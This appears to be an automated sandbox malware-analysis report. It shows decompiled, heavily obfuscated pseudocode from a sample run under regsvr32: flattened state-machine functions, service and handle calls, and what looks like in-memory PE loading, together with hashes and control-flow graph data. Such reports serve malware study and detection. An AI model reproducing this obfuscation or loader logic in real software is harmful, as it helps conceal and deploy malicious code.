                                                                                                                								_t360 = E001A8E38(_v104, _v24, _v112, _v48,  *_t429, _t382); // executed
                                                                                                                								_t382 = _v144;
                                                                                                                								_t439 =  &(_t439[4]);
                                                                                                                								_v16 = _t360;
                                                                                                                								_t355 = _v136;
                                                                                                                								_t413 = 0x772a3ce;
                                                                                                                								_t432 =  !=  ? 0x772a3ce : 0xd273812;
                                                                                                                								continue;
                                                                                                                							} else {
                                                                                                                								if(_t432 == 0xf7de38) {
                                                                                                                									E001B17D2(_v120, _v20, _t437);
                                                                                                                									_t432 = 0xa1d1e2a;
                                                                                                                									goto L11;
                                                                                                                								} else {
                                                                                                                									if(_t432 == 0x3dc7f9a) {
                                                                                                                										E001B640E(_v56, _v32, _t437, _a4, _v84);
                                                                                                                										_t439 =  &(_t439[3]);
                                                                                                                										L15:
                                                                                                                										_t432 = 0xf7de38;
                                                                                                                										goto L11;
                                                                                                                									} else {
                                                                                                                										if(_t432 == _t413) {
                                                                                                                											E001ACD1C(_v28, _v148, _v116, _v164,  &_v8, _t382, _v92, _v72, _t437, _v16);
                                                                                                                											_t432 =  !=  ? 0x3dc7f9a : 0xd273812;
                                                                                                                											E001BED7B(_v16, _v128, _v108, _v100);
                                                                                                                											_t439 =  &(_t439[0xa]);
                                                                                                                											L28:
                                                                                                                											_t382 = _v144;
                                                                                                                											_t413 = 0x772a3ce;
                                                                                                                											goto L29;
                                                                                                                										} else {
                                                                                                                											if(_t432 == 0x7b0f732) {
                                                                                                                												_push(_t382);
                                                                                                                												_t437 = E001A303A(_t382, 0x2000);
                                                                                                                												_t439 =  &(_t439[3]);
                                                                                                                												_t432 =  !=  ? 0xfd07dd1 : 0xa1d1e2a;
                                                                                                                												L11:
                                                                                                                												_t355 = _v136;
                                                                                                                												L12:
                                                                                                                												_t382 = _v144;
                                                                                                                												goto L1;
                                                                                                                											} else {
                                                                                                                												if(_t432 != 0x8c861f1) {
                                                                                                                													goto L29;
                                                                                                                												} else {
                                                                                                                													_t432 = 0xcaa30f9;
                                                                                                                													continue;
                                                                                                                												}
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                							goto L30;
                                                                                                                						}
                                                                                                                						if(_t432 == 0xa1d1e2a) {
                                                                                                                							E001B17D2(_v152, _v132, _t381);
                                                                                                                							_t432 = 0xf52315e;
                                                                                                                							goto L28;
                                                                                                                						} else {
                                                                                                                							if(_t432 == 0xcaa30f9) {
                                                                                                                								_push(_t382);
                                                                                                                								_t355 = E001A303A(_t382, 0x20000); // executed
                                                                                                                								_t381 = _t355;
                                                                                                                								_t439 =  &(_t439[3]);
                                                                                                                								if(_t381 != 0) {
                                                                                                                									_t432 = 0x7b0f732;
                                                                                                                									goto L11;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t432 == 0xd273812) {
                                                                                                                									_t429 = _t429 + 0x2c;
                                                                                                                									asm("sbb esi, esi");
                                                                                                                									_t432 = (_t432 & 0x08070918) + 0xf7de38;
                                                                                                                									goto L2;
                                                                                                                								} else {
                                                                                                                									if(_t432 != 0xfd07dd1) {
                                                                                                                										goto L29;
                                                                                                                									} else {
                                                                                                                										_push( &_v4);
                                                                                                                										_push(_v80);
                                                                                                                										_push(_t382);
                                                                                                                										_push(_t382);
                                                                                                                										_push(_v76);
                                                                                                                										_push(_v68);
                                                                                                                										_push(_t382);
                                                                                                                										_push(_v60);
                                                                                                                										_push(_t381);
                                                                                                                										_push(_t382);
                                                                                                                										_push( &_v12);
                                                                                                                										_push(_v156);
                                                                                                                										_t364 = E001A32B3(_v140, _v52);
                                                                                                                										_t439 = _t439 - 0xc + 0x3c;
                                                                                                                										if(_t364 == 0) {
                                                                                                                											goto L15;
                                                                                                                										} else {
                                                                                                                											_t366 = E001ACCA2();
                                                                                                                											_t432 = 0x8fee750;
                                                                                                                											_t355 = _v12 * 0x2c + _t381;
                                                                                                                											_v136 = _v12 * 0x2c + _t381;
                                                                                                                											_t429 =  >=  ? _t381 : (_t366 & 0x0000001f) * 0x2c + _t381;
                                                                                                                											goto L12;
                                                                                                                										}
                                                                                                                										L31:
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						break;
                                                                                                                						L29:
                                                                                                                						_t355 = _v136;
                                                                                                                					} while (_t432 != 0xf52315e);
                                                                                                                					L30:
                                                                                                                					return _t355;
                                                                                                                					goto L31;
                                                                                                                				}
                                                                                                                			}


































































                                                                                                                0x001a3cf8
                                                                                                                0x001a3cff
                                                                                                                0x001a3d0a
                                                                                                                0x001a3d0e
                                                                                                                0x001a3d0f
                                                                                                                0x001a3d10
                                                                                                                0x001a3d17
                                                                                                                0x001a3d1e
                                                                                                                0x001a3d1f
                                                                                                                0x001a3d26
                                                                                                                0x001a3d27
                                                                                                                0x001a3d28
                                                                                                                0x001a3d29
                                                                                                                0x001a3d38
                                                                                                                0x001a3d3d
                                                                                                                0x001a3d42
                                                                                                                0x00000000
                                                                                                                0x001a3d48
                                                                                                                0x001a3d4c
                                                                                                                0x001a3d54
                                                                                                                0x001a3d66
                                                                                                                0x001a3d6a
                                                                                                                0x001a3d6e
                                                                                                                0x00000000
                                                                                                                0x001a3d6e
                                                                                                                0x00000000
                                                                                                                0x001a3d42
                                                                                                                0x001a3cf2
                                                                                                                0x001a3ce5
                                                                                                                0x001a3cd9
                                                                                                                0x00000000
                                                                                                                0x001a3de0
                                                                                                                0x001a3de0
                                                                                                                0x001a3de4
                                                                                                                0x001a3dfa
                                                                                                                0x001a3dfa
                                                                                                                0x00000000
                                                                                                                0x001a3dfa

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: )$,ko^$7n3$7n3$Ji$V($]By$c\x${w
                                                                                                                • API String ID: 3098006287-1107212377
                                                                                                                • Opcode ID: 37df18c64e33afa48591d15ddaa7b434d1e1566a31ab6131a220b9f10129294d
                                                                                                                • Instruction ID: 1fd9ee0042776a639fe24313031428b6b8df1e57198fd69366067c839be59e12
                                                                                                                • Opcode Fuzzy Hash: 37df18c64e33afa48591d15ddaa7b434d1e1566a31ab6131a220b9f10129294d
                                                                                                                • Instruction Fuzzy Hash: B20221769083809FD364CF26C586A4BBBE2FBC5304F108A2DF5A996261D7B58949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph (legend: Executed, Not Executed)
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001C13A3() {
                                                                                                                				char _v524;
                                                                                                                				signed int _v528;
                                                                                                                				intOrPtr _v532;
                                                                                                                				signed int _v540;
                                                                                                                				intOrPtr _v544;
                                                                                                                				intOrPtr _v548;
                                                                                                                				intOrPtr _v552;
                                                                                                                				intOrPtr _v556;
                                                                                                                				intOrPtr _v560;
                                                                                                                				intOrPtr _v564;
                                                                                                                				intOrPtr _v568;
                                                                                                                				char _v572;
                                                                                                                				intOrPtr _v576;
                                                                                                                				char _v580;
                                                                                                                				signed int _v584;
                                                                                                                				signed int _v588;
                                                                                                                				signed int _v592;
                                                                                                                				signed int _v596;
                                                                                                                				signed int _v600;
                                                                                                                				signed int _v604;
                                                                                                                				signed int _v608;
                                                                                                                				signed int _v612;
                                                                                                                				signed int _v616;
                                                                                                                				signed int _v620;
                                                                                                                				signed int _v624;
                                                                                                                				signed int _v628;
                                                                                                                				signed int _v632;
                                                                                                                				signed int _v636;
                                                                                                                				signed int _v640;
                                                                                                                				signed int _v644;
                                                                                                                				signed int _v648;
                                                                                                                				signed int _v652;
                                                                                                                				signed int _v656;
                                                                                                                				signed int _v660;
                                                                                                                				signed int _v664;
                                                                                                                				signed int _v668;
                                                                                                                				signed int _v672;
                                                                                                                				signed int _v676;
                                                                                                                				signed int _v680;
                                                                                                                				signed int _v684;
                                                                                                                				signed int _v688;
                                                                                                                				signed int _v692;
                                                                                                                				signed int _v696;
                                                                                                                				signed int _v700;
                                                                                                                				signed int _v704;
                                                                                                                				signed int _v708;
                                                                                                                				signed int _v712;
                                                                                                                				intOrPtr _t309;
                                                                                                                				void* _t312;
                                                                                                                				signed int _t314;
                                                                                                                				void* _t315;
                                                                                                                				intOrPtr _t317;
                                                                                                                				void* _t320;
                                                                                                                				void* _t321;
                                                                                                                				char _t328;
                                                                                                                				signed int _t350;
                                                                                                                				signed int _t351;
                                                                                                                				signed int _t352;
                                                                                                                				signed int _t353;
                                                                                                                				void* _t356;
                                                                                                                
                                                                                                                				_v528 = _v528 & 0x00000000;
                                                                                                                				_v532 = 0x1878ef;
                                                                                                                				_t321 = 0xe6b0b61;
                                                                                                                				_v588 = 0x2f6858;
                                                                                                                				_t5 =  &_v588; // 0x2f6858
                                                                                                                				_t350 = 0x73;
                                                                                                                				_v588 =  *_t5 / _t350;
                                                                                                                				_v588 = _v588 ^ 0x00006989;
                                                                                                                				_t320 = 0;
                                                                                                                				_v604 = 0x143052;
                                                                                                                				_v604 = _v604 + 0x84a1;
                                                                                                                				_v604 = _v604 ^ 0x0014b5f3;
                                                                                                                				_v656 = 0xfbe874;
                                                                                                                				_v656 = _v656 + 0x61d6;
                                                                                                                				_v656 = _v656 + 0xffffea3d;
                                                                                                                				_v656 = _v656 ^ 0x00fc3484;
                                                                                                                				_v696 = 0xff5b70;
                                                                                                                				_v696 = _v696 | 0x535d98c7;
                                                                                                                				_v696 = _v696 + 0xfffff950;
                                                                                                                				_v696 = _v696 + 0xffffd1ca;
                                                                                                                				_v696 = _v696 ^ 0x53ffa711;
                                                                                                                				_v652 = 0x524336;
                                                                                                                				_v652 = _v652 << 1;
                                                                                                                				_v652 = _v652 | 0x0b93763e;
                                                                                                                				_v652 = _v652 ^ 0x0bbf92e8;
                                                                                                                				_v660 = 0x88d82a;
                                                                                                                				_v660 = _v660 << 0xa;
                                                                                                                				_v660 = _v660 + 0xffff6819;
                                                                                                                				_v660 = _v660 ^ 0x2367960d;
                                                                                                                				_v608 = 0xd91fa2;
                                                                                                                				_v608 = _v608 >> 3;
                                                                                                                				_v608 = _v608 ^ 0x0013678b;
                                                                                                                				_v600 = 0x89853e;
                                                                                                                				_t351 = 5;
                                                                                                                				_v600 = _v600 * 0x4a;
                                                                                                                				_v600 = _v600 ^ 0x27c2a7a2;
                                                                                                                				_v644 = 0x61cd84;
                                                                                                                				_v644 = _v644 + 0xffff330a;
                                                                                                                				_v644 = _v644 + 0x279e;
                                                                                                                				_v644 = _v644 ^ 0x0061f33c;
                                                                                                                				_v708 = 0x92cce;
                                                                                                                				_v708 = _v708 + 0xbb92;
                                                                                                                				_v708 = _v708 >> 2;
                                                                                                                				_v708 = _v708 + 0xffff1a93;
                                                                                                                				_v708 = _v708 ^ 0x000d2f6b;
                                                                                                                				_v620 = 0xbd1e0e;
                                                                                                                				_v620 = _v620 / _t351;
                                                                                                                				_v620 = _v620 ^ 0x002eeadc;
                                                                                                                				_v584 = 0x760b38;
                                                                                                                				_v584 = _v584 << 0xa;
                                                                                                                				_v584 = _v584 ^ 0xd827259a;
                                                                                                                				_v628 = 0xa9e30f;
                                                                                                                				_v628 = _v628 | 0x1d27cf5f;
                                                                                                                				_v628 = _v628 ^ 0x1dae209f;
                                                                                                                				_v700 = 0x932dee;
                                                                                                                				_v700 = _v700 >> 8;
                                                                                                                				_t352 = 0x78;
                                                                                                                				_v700 = _v700 / _t352;
                                                                                                                				_v700 = _v700 ^ 0xdcaf0248;
                                                                                                                				_v700 = _v700 ^ 0xdca84581;
                                                                                                                				_v692 = 0x4e7658;
                                                                                                                				_v692 = _v692 * 0x38;
                                                                                                                				_v692 = _v692 >> 6;
                                                                                                                				_v692 = _v692 + 0xffffc067;
                                                                                                                				_v692 = _v692 ^ 0x004989d0;
                                                                                                                				_v712 = 0x19f0a3;
                                                                                                                				_v712 = _v712 >> 6;
                                                                                                                				_v712 = _v712 + 0xffffbcc9;
                                                                                                                				_v712 = _v712 << 5;
                                                                                                                				_v712 = _v712 ^ 0x000b5c15;
                                                                                                                				_v676 = 0x4b761a;
                                                                                                                				_v676 = _v676 + 0xab76;
                                                                                                                				_v676 = _v676 | 0xad8bdcbc;
                                                                                                                				_v676 = _v676 ^ 0xadc1f077;
                                                                                                                				_v672 = 0xbd59d7;
                                                                                                                				_v672 = _v672 ^ 0xb1e0d3f9;
                                                                                                                				_v672 = _v672 << 1;
                                                                                                                				_v672 = _v672 ^ 0x62b2b1eb;
                                                                                                                				_v612 = 0x3dbded;
                                                                                                                				_t353 = 0x23;
                                                                                                                				_v612 = _v612 / _t353;
                                                                                                                				_v612 = _v612 ^ 0x00018277;
                                                                                                                				_v680 = 0x41be48;
                                                                                                                				_v680 = _v680 * 7;
                                                                                                                				_v680 = _v680 + 0xffffba00;
                                                                                                                				_v680 = _v680 ^ 0x01c55266;
                                                                                                                				_v648 = 0x6aa77c;
                                                                                                                				_v648 = _v648 | 0x3f97aaee;
                                                                                                                				_v648 = _v648 << 0x10;
                                                                                                                				_v648 = _v648 ^ 0xaff75eba;
                                                                                                                				_v596 = 0xf8fdbe;
                                                                                                                				_v596 = _v596 + 0x5176;
                                                                                                                				_v596 = _v596 ^ 0x00f4c20d;
                                                                                                                				_v664 = 0x6f8710;
                                                                                                                				_v664 = _v664 + 0xffff8f2a;
                                                                                                                				_v664 = _v664 >> 0x10;
                                                                                                                				_v664 = _v664 ^ 0x000f2be4;
                                                                                                                				_v592 = 0x3c4ec8;
                                                                                                                				_v592 = _v592 | 0xac0a4eef;
                                                                                                                				_v592 = _v592 ^ 0xac3533e1;
                                                                                                                				_v704 = 0x3b1eeb;
                                                                                                                				_v704 = _v704 + 0xffffd56f;
                                                                                                                				_v704 = _v704 + 0xffff6cd9;
                                                                                                                				_v704 = _v704 ^ 0x8b69afc8;
                                                                                                                				_v704 = _v704 ^ 0x8b53d426;
                                                                                                                				_v640 = 0xdef71;
                                                                                                                				_v640 = _v640 << 3;
                                                                                                                				_v640 = _v640 + 0xffffec65;
                                                                                                                				_v640 = _v640 ^ 0x0064433f;
                                                                                                                				_v616 = 0xea0634;
                                                                                                                				_v616 = _v616 + 0xeb63;
                                                                                                                				_v616 = _v616 ^ 0x00e7901e;
                                                                                                                				_v624 = 0xa05a60;
                                                                                                                				_v624 = _v624 >> 7;
                                                                                                                				_v624 = _v624 ^ 0x00093cc4;
                                                                                                                				_v668 = 0xa176a5;
                                                                                                                				_v668 = _v668 >> 0xa;
                                                                                                                				_v668 = _v668 + 0xffff80dd;
                                                                                                                				_v668 = _v668 ^ 0xfff797cb;
                                                                                                                				_v688 = 0x693beb;
                                                                                                                				_v688 = _v688 * 0x11;
                                                                                                                				_v688 = _v688 << 9;
                                                                                                                				_v688 = _v688 | 0x0c7e3274;
                                                                                                                				_v688 = _v688 ^ 0xfdf7f2d9;
                                                                                                                				_v636 = 0x3eae9e;
                                                                                                                				_v636 = _v636 + 0xf099;
                                                                                                                				_v636 = _v636 ^ 0xa06ebc01;
                                                                                                                				_v636 = _v636 ^ 0xa05eab20;
                                                                                                                				_v632 = 0x44b33d;
                                                                                                                				_v632 = _v632 << 0xe;
                                                                                                                				_v632 = _v632 ^ 0x2cc9f997;
                                                                                                                				_t349 = _v632;
                                                                                                                				_v684 = 0x163cc3;
                                                                                                                				_v684 = _v684 << 9;
                                                                                                                				_v684 = _v684 << 4;
                                                                                                                				_v684 = _v684 ^ 0xc793c21e;
                                                                                                                				do {
                                                                                                                					while(_t321 != 0xdbb0bb) {
                                                                                                                						if(_t321 == 0x19376b1) {
                                                                                                                							E001C2545(_v652, _v660, _v608,  &_v580);
                                                                                                                							_t321 = 0xdbb0bb;
                                                                                                                							continue;
                                                                                                                						} else {
                                                                                                                							if(_t321 == 0x58c3956) {
                                                                                                                								E001B02D8(_t349, _v636, _v632, _v684);
                                                                                                                							} else {
                                                                                                                								if(_t321 == 0x666440e) {
                                                                                                                									_t309 = _v576;
                                                                                                                									_t328 = _v580;
                                                                                                                									_v568 = _t309;
                                                                                                                									_v560 = _t309;
                                                                                                                									_v552 = _t309;
                                                                                                                									_v544 = _t309;
                                                                                                                									_v540 = _v696;
                                                                                                                									_v572 = _t328;
                                                                                                                									_v564 = _t328;
                                                                                                                									_v556 = _t328;
                                                                                                                									_v548 = _t328;
                                                                                                                									_t312 = E001BEAB3(_t328, _v616, _v624, _t328,  &_v572, _t349, _v668, _v688); // executed
                                                                                                                									_t356 = _t356 + 0x18;
                                                                                                                									__eflags = _t312;
                                                                                                                									_t320 =  !=  ? 1 : _t320;
                                                                                                                									_t321 = 0x58c3956;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									if(_t321 == 0xdde7308) {
                                                                                                                										_t314 = E001BA50A(_v680, _v656, _v648, _v596, 0, _v664, _v592, _v604, _t321, _v704, _v588, _v640,  &_v524); // executed
                                                                                                                										_t349 = _t314;
                                                                                                                										_t356 = _t356 + 0x30;
                                                                                                                										__eflags = _t314 - 0xffffffff;
                                                                                                                										if(__eflags != 0) {
                                                                                                                											_t321 = 0x666440e;
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                									} else {
                                                                                                                										if(_t321 == 0xdedc1db) {
                                                                                                                											_push(_v620);
                                                                                                                											_push(0x1a109c);
                                                                                                                											_push(_v708);
                                                                                                                											_t315 = E001BF5D9(_v600, _v644, __eflags);
                                                                                                                											_t317 =  *0x1c4c10; // 0x67d820
                                                                                                                											_t249 = _t317 + 4; // 0x67d824
                                                                                                                											E001B8EB3(_t249, __eflags, _v584, _v600, _v628,  &_v524, _v700, _t315, _v692);
                                                                                                                											E001BF94B(_t315, _v712, _v676, _v672, _v612);
                                                                                                                											_t356 = _t356 + 0x34;
                                                                                                                											_t321 = 0xdde7308;
                                                                                                                											continue;
                                                                                                                										} else {
                                                                                                                											if(_t321 != 0xe6b0b61) {
                                                                                                                												goto L15;
                                                                                                                											} else {
                                                                                                                												_t321 = 0x19376b1;
                                                                                                                												continue;
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L18:
                                                                                                                						return _t320;
                                                                                                                					}
                                                                                                                					_v580 = _v580 - E001A2221(_t321);
                                                                                                                					_t321 = 0xdedc1db;
                                                                                                                					asm("sbb [esp+0x9c], edx");
                                                                                                                					L15:
                                                                                                                					__eflags = _t321 - 0xdd806ec;
                                                                                                                				} while (__eflags != 0);
                                                                                                                				goto L18;
                                                                                                                			}































































                                                                                                                0x001c1804
                                                                                                                0x001c19f6
                                                                                                                0x001c180a
                                                                                                                0x001c1810
                                                                                                                0x001c190f
                                                                                                                0x001c1916
                                                                                                                0x001c191d
                                                                                                                0x001c1924
                                                                                                                0x001c192b
                                                                                                                0x001c1932
                                                                                                                0x001c1941
                                                                                                                0x001c1953
                                                                                                                0x001c196b
                                                                                                                0x001c1972
                                                                                                                0x001c1979
                                                                                                                0x001c1980
                                                                                                                0x001c1987
                                                                                                                0x001c198b
                                                                                                                0x001c198d
                                                                                                                0x001c1990
                                                                                                                0x00000000
                                                                                                                0x001c1816
                                                                                                                0x001c181c
                                                                                                                0x001c18f2
                                                                                                                0x001c18f7
                                                                                                                0x001c18f9
                                                                                                                0x001c18fc
                                                                                                                0x001c18ff
                                                                                                                0x001c1905
                                                                                                                0x00000000
                                                                                                                0x001c1905
                                                                                                                0x001c1822
                                                                                                                0x001c1828
                                                                                                                0x001c183a
                                                                                                                0x001c183e
                                                                                                                0x001c1843
                                                                                                                0x001c1852
                                                                                                                0x001c1879
                                                                                                                0x001c187e
                                                                                                                0x001c1887
                                                                                                                0x001c18a1
                                                                                                                0x001c18a6
                                                                                                                0x001c18a9
                                                                                                                0x00000000
                                                                                                                0x001c182a
                                                                                                                0x001c1830
                                                                                                                0x00000000
                                                                                                                0x001c1836
                                                                                                                0x001c1836
                                                                                                                0x00000000
                                                                                                                0x001c1836
                                                                                                                0x001c1830
                                                                                                                0x001c1828
                                                                                                                0x001c181c
                                                                                                                0x001c1810
                                                                                                                0x001c1804
                                                                                                                0x001c1a00
                                                                                                                0x001c1a09
                                                                                                                0x001c1a09
                                                                                                                0x001c19c7
                                                                                                                0x001c19ce
                                                                                                                0x001c19d3
                                                                                                                0x001c19da
                                                                                                                0x001c19da
                                                                                                                0x001c19da
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: 6CR$?Cd$Xh/$XvN$c$k/$vQ$;i
                                                                                                                • API String ID: 2962429428-1642066035
                                                                                                                • Opcode ID: 1d02e4c71be870325b0c836d8bd5e06328124d06610abf586e55ef576630e198
                                                                                                                • Instruction ID: c627c8223f5703691073e378807d8f27de02d46203dcb436a11388359d5d8264
                                                                                                                • Opcode Fuzzy Hash: 1d02e4c71be870325b0c836d8bd5e06328124d06610abf586e55ef576630e198
                                                                                                                • Instruction Fuzzy Hash: EBE110724083809FD3A8CF65C549A9BBBE1FBD5758F108A1DF1DA86260DBB18949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 421 10008de0-10008e78 call 10006690 424 10008e7e-10008ec7 421->424 425 1000956f-10009578 421->425 424->425 426 10008ecd-10008f76 call 10006690 424->426 426->425 429 10008f7c-10008fd1 426->429 429->425 430 10008fd7-1000900a 429->430 430->425 431 10009010-10009036 430->431 431->425 432 1000903c-10009086 431->432 433 1000919b 432->433 434 1000908c-100090c9 432->434 436 1000919f-10009290 GetNativeSystemInfo call 10006650 * 2 433->436 435 100090d0-100090d8 434->435 438 10009126-10009141 435->438 439 100090da-10009124 435->439 436->425 447 10009296-1000938a 436->447 441 10009143-1000914b 438->441 439->441 443 10009189-10009193 441->443 444 1000914d-10009187 441->444 443->435 446 10009199 443->446 444->443 446->436 449 10009390-1000943f 447->449 450 10009445-10009511 GetProcessHeap HeapAlloc 447->450 449->425 449->450 451 10009513-1000956c 450->451 452 10009579-100096a7 call 10006690 450->452 451->425 457 10009b34-10009b46 call 100088f0 452->457 458 100096ad-1000992c memcpy call 100066c0 452->458 458->457 464 10009932-10009978 458->464 465 10009a3b 464->465 466 1000997e-10009a39 call 100076d0 464->466 468 10009a42-10009a89 call 10007ae0 465->468 466->468 468->457 472 10009a8f-10009ad7 call 10007030 468->472 474 10009adc-10009ae1 472->474 474->457 475 10009ae3-10009b32 call 100075d0 474->475 475->457 478 10009b47-10009b4e 475->478 479 10009b50-10009b5a 478->479 480 10009bc9-10009bd9 478->480 481 10009b84-10009bc8 479->481 482 10009b5c-10009b83 479->482
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E10008DE0(void* __eflags) {
                                                                                                                				signed int _t374;
                                                                                                                				void* _t386;
                                                                                                                				signed short* _t396;
                                                                                                                				signed int _t402;
                                                                                                                				void* _t416;
                                                                                                                				signed int _t418;
                                                                                                                				signed int _t419;
                                                                                                                				intOrPtr _t422;
                                                                                                                				intOrPtr _t434;
                                                                                                                				signed int _t436;
                                                                                                                				signed int _t438;
                                                                                                                				void* _t446;
                                                                                                                				signed int _t448;
                                                                                                                				signed int _t449;
                                                                                                                				void* _t452;
                                                                                                                				signed int _t466;
                                                                                                                				signed int _t475;
                                                                                                                				signed int _t479;
                                                                                                                				void* _t486;
                                                                                                                				signed int _t487;
                                                                                                                				signed int _t494;
                                                                                                                				void* _t507;
                                                                                                                				signed int _t512;
                                                                                                                				void* _t516;
                                                                                                                				signed int _t517;
                                                                                                                				signed int _t524;
                                                                                                                				intOrPtr _t527;
                                                                                                                				signed int _t528;
                                                                                                                				void* _t534;
                                                                                                                				signed int _t535;
                                                                                                                				signed int _t536;
                                                                                                                				signed int _t537;
                                                                                                                				void* _t538;
                                                                                                                				signed int _t539;
                                                                                                                				void* _t549;
                                                                                                                				void* _t558;
                                                                                                                				signed int _t561;
                                                                                                                				signed int _t573;
                                                                                                                				void* _t585;
                                                                                                                				signed int _t601;
                                                                                                                				intOrPtr _t612;
                                                                                                                				signed int _t613;
                                                                                                                				void* _t628;
                                                                                                                				signed int _t641;
                                                                                                                				signed int _t653;
                                                                                                                				signed int _t660;
                                                                                                                				signed int _t664;
                                                                                                                				signed int _t670;
                                                                                                                				signed int _t687;
                                                                                                                				signed int _t693;
                                                                                                                				signed int _t700;
                                                                                                                				signed int _t710;
                                                                                                                				signed int _t711;
                                                                                                                				signed int _t721;
                                                                                                                				signed int _t724;
                                                                                                                				signed int _t739;
                                                                                                                				signed int _t744;
                                                                                                                				signed int _t750;
                                                                                                                				signed int _t755;
                                                                                                                				signed int _t768;
                                                                                                                				signed int _t775;
                                                                                                                				signed int _t785;
                                                                                                                				signed int _t800;
                                                                                                                				signed int _t802;
                                                                                                                				signed int _t804;
                                                                                                                				signed int _t807;
                                                                                                                				signed int _t808;
                                                                                                                				signed int _t815;
                                                                                                                				signed int _t816;
                                                                                                                				signed int _t822;
                                                                                                                				signed int _t823;
                                                                                                                				signed int _t824;
                                                                                                                				intOrPtr _t827;
                                                                                                                				signed int _t833;
                                                                                                                				signed int _t843;
                                                                                                                				signed int _t869;
                                                                                                                				signed int _t880;
                                                                                                                				signed int _t888;
                                                                                                                				intOrPtr _t895;
                                                                                                                				signed int _t904;
                                                                                                                				signed int _t910;
                                                                                                                				signed int _t916;
                                                                                                                				signed int _t924;
                                                                                                                				signed int _t927;
                                                                                                                				signed int _t928;
                                                                                                                				signed int _t929;
                                                                                                                				signed int _t930;
                                                                                                                				signed int _t934;
                                                                                                                				signed int _t936;
                                                                                                                				signed int _t953;
                                                                                                                				signed int _t964;
                                                                                                                				signed int _t969;
                                                                                                                				signed int _t972;
                                                                                                                				signed int _t976;
                                                                                                                				signed int _t977;
                                                                                                                				signed int _t980;
                                                                                                                				signed int _t981;
                                                                                                                				signed int _t982;
                                                                                                                				signed int _t984;
                                                                                                                				signed int _t985;
                                                                                                                				signed int _t986;
                                                                                                                				signed int _t990;
                                                                                                                				signed int _t992;
                                                                                                                				signed int _t993;
                                                                                                                				signed int _t997;
                                                                                                                				signed int _t1019;
                                                                                                                				signed int _t1020;
                                                                                                                				signed int _t1023;
                                                                                                                				intOrPtr* _t1025;
                                                                                                                				signed int _t1026;
                                                                                                                				signed int _t1032;
                                                                                                                				signed int _t1034;
                                                                                                                				signed int _t1037;
                                                                                                                				intOrPtr _t1042;
                                                                                                                				intOrPtr _t1043;
                                                                                                                				signed int _t1044;
                                                                                                                				void* _t1054;
                                                                                                                				signed int _t1063;
                                                                                                                				signed int _t1070;
                                                                                                                				signed int _t1078;
                                                                                                                				signed int _t1079;
                                                                                                                				intOrPtr _t1087;
                                                                                                                				signed int _t1088;
                                                                                                                				signed int _t1093;
                                                                                                                				signed int _t1102;
                                                                                                                				signed int _t1113;
                                                                                                                				signed int _t1114;
                                                                                                                				intOrPtr _t1141;
                                                                                                                				signed int _t1142;
                                                                                                                				signed int _t1152;
                                                                                                                				signed int _t1166;
                                                                                                                				signed int _t1175;
                                                                                                                				signed int _t1182;
                                                                                                                				signed int _t1218;
                                                                                                                				void* _t1226;
                                                                                                                				void* _t1227;
                                                                                                                				void* _t1228;
                                                                                                                				void* _t1229;
                                                                                                                				void* _t1230;
                                                                                                                				void* _t1231;
                                                                                                                
                                                                                                                				_t721 =  *0x1006c2cc; // 0x0
                                                                                                                				_t1034 =  *0x1006c2d0; // 0x0
                                                                                                                				_t1114 =  *0x1006c2bc; // 0x0
                                                                                                                				_t1019 =  *0x1006c2c0; // 0x0
                                                                                                                				 *(_t1226 + 0x1c) = _t1034 * _t1019;
                                                                                                                				_t374 =  *0x1006c2c4; // 0x0
                                                                                                                				_t641 =  *0x1006c2c8; // 0x0
                                                                                                                				_t9 = ((_t374 * _t721 + _t1034 + _t1114 + 1) * _t374 + _t1019 * _t721 + _t1114 + _t1114 * 2) * 4; // 0x40
                                                                                                                				 *((intOrPtr*)(_t1226 + 0x24)) = 0;
                                                                                                                				_t386 = E10006690((_t641 * 4 - 4) * _t1034 + _t9 + 0x40,  *((intOrPtr*)(_t1226 + 0x5c)) + 2 + (1 -  *(_t1226 + 0x1c) -  *0x1006c2c4) *  *0x1006c2cc - _t1034 - _t1019 +  *0x1006c2c4);
                                                                                                                				_t1227 = _t1226 + 4;
                                                                                                                				if(_t386 == 0) {
                                                                                                                					L21:
                                                                                                                					return 0;
                                                                                                                				} else {
                                                                                                                					_t724 =  *0x1006c2c4; // 0x0
                                                                                                                					_t17 = _t1114 + 2; // 0x2
